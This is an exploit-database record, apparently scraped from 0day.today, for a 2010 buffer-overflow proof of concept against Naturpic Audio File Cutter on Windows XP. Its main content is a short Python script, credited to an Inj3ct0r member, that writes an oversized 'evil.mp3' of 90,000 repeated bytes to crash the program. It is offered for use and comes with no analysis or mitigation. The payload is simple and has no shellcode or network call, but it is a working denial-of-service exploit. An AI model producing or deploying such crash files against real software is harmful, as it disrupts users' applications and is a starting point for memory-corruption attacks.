Description
Exploit for windows platform in category dos / poc
{"id": "1337DAY-ID-13582", "type": "zdt", "bulletinFamily": "exploit", "title": "Naturpic Audio File Cutter(.wma,.mp3,.wav,.ogg) Buffer Overflow POC", "description": "Exploit for windows platform in category dos / poc", "published": "2010-08-06T00:00:00", "modified": "2010-08-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/13582", "reporter": "Sid3^effects", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-09T01:00:40", "viewCount": 5, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "sourceHref": "https://0day.today/exploit/13582", "sourceData": "===================================================================\r\nNaturpic Audio File Cutter(.wma,.mp3,.wav,.ogg) Buffer Overflow POC\r\n===================================================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm Sid3^effects member from Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n#######################################################################################################\r\n\r\n#!/usr/bin/python\r\n#\r\n# Title: Naturpic Audio File Cutter(.wma,.mp3,.wav,.ogg) Buffer Overflow POC\r\n# Author: Sid3^effects aKa HaRi\r\n# Date: August 5th, 2010\r\n# Platform: Windows XP sp3 En\r\n# Thanks to: r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,SeeMe,gunslinger_,Sn!pEr.S!Te,Napst3r\u00e2\u201e\u00a2\r\n# greetz to : Topsecure.net and my friends luv y0 guyz\r\n#\r\n# Usage : File-->Add Files-->load your evil video list(.avi) or any supported file formats :) \r\n\r\nprint \"################################################################################\"\r\nprint \" Naturpic Audio File Cutter(.wma,.mp3,.wav,.ogg) Buffer Overflow POC \"\r\nprint \" By: Sid3^effects \"\r\nprint \" Usage: Open --> select your evil file (.wma,.mp3,.wav,.ogg) \" \r\nprint \"################################################################################\"\r\n\r\n\r\nbuff = (\"\\x41\" * 90000)\r\n\r\ntry:\r\n f1 = open(\"evil.mp3\",\"w\");\r\n f1.write(buff);\r\n f1.close();\r\n\r\n print \"\\n Naturpic Audio File Cutter Buffer Overflow POC\"\r\n print \"\\nFile Created Successfully.\\n\"\r\n \r\nexcept:\r\n print \"Error.\"\r\n\r\n\n\n# 0day.today [2018-01-08] #", "_state": {"dependencies": 1647853327}}
{}